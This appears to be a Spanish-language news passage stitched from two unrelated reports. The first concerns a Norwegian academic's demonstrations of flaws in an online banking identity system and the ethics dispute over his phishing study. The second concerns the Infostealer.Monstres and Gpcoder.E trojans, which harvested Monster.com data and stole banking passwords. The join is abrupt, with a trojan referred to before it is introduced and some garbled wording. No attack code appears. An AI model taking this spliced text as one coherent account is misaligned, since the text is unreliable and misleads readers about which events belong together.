Hole y su grupo, que utilizaron sólo sus propias cuentas, realizaron durante esos meses varias demostraciones ante expertos de seguridad para probar los fallos del sistema, a pesar de que las autoridades habían asegurado en marzo que el problema estaba solucionado. Uno de sus estudiantes ideó además en sólo 100 horas de trabajo un código para sabotear las soluciones de los bancos digitales, según la revista.

Tanto el Centro Noruego para Seguridad en la Información (NorSIS) como la entidad encargada de emitir los identificadores y controlar la seguridad del sistema rechazaron los métodos de Hole por su supuesta falta de ética y avisaron de posibles acciones legales contra él y su equipo.

Lo que también llama la atención de muchos internautas y lectores de la revista es como se pudo considerar riguroso un estudio sobre phishing cuando los emails que buscan engañar a personas incautas sin ningun tipo de formación en seguridad informática, eran enviados entre los propios alumnos y el profesor; de no ser asi, se implicaria a terceros y no se usarian ni las propias cuentas ni los propios correos, lo cual seria ilegal.

El funcionamiento del troyano consistía en realizar conexiones hacia la web de Monster.com y así realizar búsquedas laborales utilizando credenciales de empresas empleadoras. La comunicación con la web en cuestión era realizada a través de subdominios dedicados a personas/empresas que pagan por el servicio de búsqueda de candidatos apuestos de trabajo.

Dicho servicio, puede ser accedido mediante un pago periódico y en algunos casos está limitado en la cantidad de consultas que pueden ser realizadas, por lo que nos hace suponer que para llegar al 1,6 millón de datos que según Symantec han sido extraídos, deberían de haber utilizado los datos de acceso de empresas que han contratado el servicio semestral o anual, los cuales no tienen límites de consultas.

Symantec también resalta la similitud entre Infostealer.Monstres y Trojan.Gpcoder.E, ambos utilizan un mismo archivo e icono, similar al de la compañia Monster.com, lo que daría a suponer que un mismo grupo de individuos estaría detrás de ambos troyanos.

Además, Trojan.Gpcoder.E, ha estado utilizando datos reales en correos basura, lo que ha dado como resultado en un excelente ataque de phishing. Algunos medios informaron que el ataque había sido hacia la web de Monster.com y utilizando cuentas de empleados de dicha empresa, pero parece ser que en realidad fueron cuentas de empleadores y el ataque lo sufrieron los usuarios de la web y no un servidor como se pretendía dar a entender.

En algunos de esos correos se pedía a los usuarios que descargasen la herramienta Monster Job Seeker, que supuestamente sirve para agilizar la búsqueda de empleo, pero que en realidad es un programa malicioso que supone un doble perjuicio por el usuario.

Por un lado, es capaz de memorizar las claves bancarias que se utilizan en las operaciones por internet y, por otro, encripta los archivos del ordenador y pide una recompensa para liberarlos.

Los responsables de Monster.com aseguran que el incidente no tiene nada que ver con problemas de seguridad de la web e indican que los datos robados no son diferentes que los que se pueden encontrar en cualquier listín telefónico.